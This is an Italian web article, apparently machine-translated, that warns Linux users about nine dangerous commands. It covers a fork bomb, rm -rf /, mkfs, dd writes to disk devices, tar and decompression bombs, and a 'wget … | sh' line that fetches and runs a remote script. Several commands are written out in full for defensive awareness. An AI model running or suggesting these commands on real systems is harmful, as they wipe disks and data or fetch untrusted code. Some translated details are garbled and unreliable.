it.hideout-lastation.com
Paradiso Per Designer E Sviluppatori


9 Comandi e codici di Linux da diffidare

I comandi di shell / terminal di Linux sono molto potenti e un semplice comando potrebbe portare a eliminare una cartella, i file o la cartella radice, ecc.

In alcuni casi, Linux non ti chiederà nemmeno la conferma, ma eseguirà immediatamente il comando causando la perdita di dati e informazioni preziosi memorizzati in questi file e cartelle.

È normale che le persone pubblichino contenuti sul Web raccomandando ai nuovi utenti Linux di eseguire questi comandi . Questo potrebbe sembrare uno scherzo per qualcuno che ha pubblicato il contenuto ma non è una cosa da ridere per la persona dall'altra parte.

Abbiamo raccolto alcuni comandi Linux che sono abbastanza dannosi per il tuo sistema per aiutarti a evitarli. Tieni presente che sono davvero pericolosi e possono persino essere modificati in una varietà di modi per produrre nuovi comandi per infliggere più danni.

Una cosa importante da notare è che alcuni di questi comandi sono pericolosi solo se sono preceduti da sudo su Ubuntu . Mentre su altre distribuzioni di Linux, la maggior parte di questi comandi dati saranno pericolosi da eseguire come root.

Dai un'occhiata ai 9 comandi e codici che dovresti evitare di eseguire.

1. Comando della bomba a forcella di Linux

:(){ :|: & };: noto anche come Fork Bomb è un attacco denial-of-service contro un sistema Linux. :(){ :|: & };: è una funzione bash. Una volta eseguito, si ripete più volte fino a quando il sistema si blocca .

Puoi sbarazzartene solo riavviando il tuo sistema. Quindi fai attenzione quando esegui questo comando sulla tua shell Linux.

2. Comando mv folder / dev / null

mv folder/dev/null è un altro comando rischioso. Dev/null o null device è un file di dispositivo che scarta tutti i dati scritti su di esso ma segnala che l'operazione di scrittura è stata eseguita correttamente . È anche conosciuto come buco bucked o buco nero .

3. comando rm -rf

rm -rf comando rm -rf è un modo veloce per eliminare una cartella e il suo contenuto nel sistema operativo Linux. Se non sai come usarlo correttamente, può diventare molto pericoloso per il sistema. Le combinazioni e le opzioni più comuni utilizzate con il comando rm-rf sono elencate di seguito:

  • rm comando rm è usato per cancellare i file nel sistema Linux.
  • rm -f comando rm -f rimuove i file di sola lettura nella cartella senza chiedere conferma.
  • rm -r comando rm -r elimina il contenuto di una cartella in modo ricorsivo.
  • rm -d comando è usato per rimuovere una directory vuota ma rifiuterà di rimuovere la directory se non è vuota.
  • rm -rf/ comando è usato per l'eliminazione forzata (lo elimina anche se è protetto da scrittura) di tutto il contenuto nella directory principale e nelle sottocartelle.
  • rm -rf* comando rm -rf* viene utilizzato per l'eliminazione forzata di tutto il contenuto nella directory corrente (directory in cui si sta attualmente lavorando) e nelle sottocartelle.
  • rm -rf. il comando viene utilizzato per l'eliminazione forzata di tutto il contenuto nella cartella corrente e nelle sottocartelle. È anche possibile utilizzare il comando rm -r.[^.]* .
  • rm -i comando rm -i è usato per la rimozione di file e cartelle ma un prompt apparirà prima della rimozione.

4. comando mkfs

mkfs può essere un comando pericoloso per il tuo sistema basato su Linux se non conosci il suo scopo. Qualsiasi cosa scritta dopo l'mkfs verrà formattata e sostituita da un file system Linux vuoto .

Tutti i comandi indicati di seguito formatteranno il disco rigido e richiede i diritti di amministratore:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

Il comando mkfs.cramfs farà la stessa cosa di quanto sopra ma non richiede i diritti di amministratore per l'esecuzione.

5. Tar Bomb

Il comando tar viene utilizzato per combinare più file in un singolo file (file archiviato) in formato .tar . Una bomba Tape Archive (Tar) può essere creata con questo comando.

Si tratta di un file di archivio che esplode in migliaia o milioni di file con nomi simili ai file esistenti nella directory corrente anziché in una nuova directory quando vengono estratti.

Puoi evitare di diventare vittima di un tar bomb creando regolarmente una nuova directory di protezione ogni volta che ricevi un file tar e quindi sposta il file tar ricevuto in questa directory prima di decodificare.

Se il file tar è effettivamente un tar bomb, puoi semplicemente rimuovere la directory appena creata per sbarazzartene. Un altro modo per evitare l'esplosione di una tar bomb è tramite l'opzione -t di elencare tutto il contenuto di un file tar per darti un'idea del tipo di contenuto contenuto nel file tar.

6. comando dd

Il comando dd è usato per copiare e convertire partizioni del disco rigido . Tuttavia, può rivelarsi pericoloso se si specifica la destinazione sbagliata.

Il comando può essere uno di questi:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

Il seguente comando azzererà l'intero disco rigido primario: dd if=/dev/zero of=/dev/had

7. Codice script shell

Qualcuno potrebbe vittimizzarti dandoti il ​​link a uno script di shell e avendoti approvato di scaricarlo ed eseguirlo . Lo script potrebbe contenere codice dannoso o pericoloso all'interno. Il formato del comando può essere simile a questo: wget http://some_malicious_source -O- | sh wget http://some_malicious_source -O- | sh . Il wget scaricherà lo script mentre lo sh eseguirà l'esecuzione dello script.

8. Codice sorgente dannoso

Qualcuno ti dà il codice sorgente e ti chiede di compilarlo. Il codice potrebbe sembrare un normale codice, ma in realtà un codice dannoso è nascosto nell'ampio codice sorgente e potrebbe causare danni al sistema. Per evitare di essere vittima di questo tipo di attacco, accetta e compilare il codice sorgente solo da fonti affidabili .

9. Bomba di decompressione

Hai ricevuto un file compresso e ti viene chiesto di estrarre questo file che sembra essere di dimensioni molto ridotte ma potrebbe contenere alcuni KB. In realtà, questo file compresso di piccole dimensioni contiene dati molto compressi .

Una volta decompresso il file, vengono estratti centinaia di GB di dati che possono riempire il disco rigido per ridurre le prestazioni del sistema. Per evitare questa situazione, ricorda sempre di accettare i dati da fonti affidabili.

Da dove queste aziende hanno i loro nomi - Parte 2

Da dove queste aziende hanno i loro nomi - Parte 2

C'è una storia dietro tutto, specialmente i grandi marchi che usiamo così spesso nella nostra vita quotidiana. Quindi, non sarebbe interessante conoscere le storie dietro i marchi famosi per riempire il tuo vuoto di conoscenza o solo per essere il signor tutto-in-comune tra i tuoi amici?In precedenza, ho fatto la prima parte di questo post e ho coperto un lungo elenco di aziende con origini interessanti dei loro nomi.

(Consigli tecnici e di design)

10 consigli pratici per mantenere i tuoi campioni di colore e le tavolozze organizzate

10 consigli pratici per mantenere i tuoi campioni di colore e le tavolozze organizzate

Sapere di avere qualcosa, ma non sapere dove sia può essere una sensazione frustrante. Questo può essere particolarmente vero per i colori che hai creato o salvato per i tuoi progetti di design. È una perdita di tempo dover cercare tra i campioni di colore, solo per iniziare la ricerca dappertutto quando è il momento di cambiare tonalità. La

(Consigli tecnici e di design)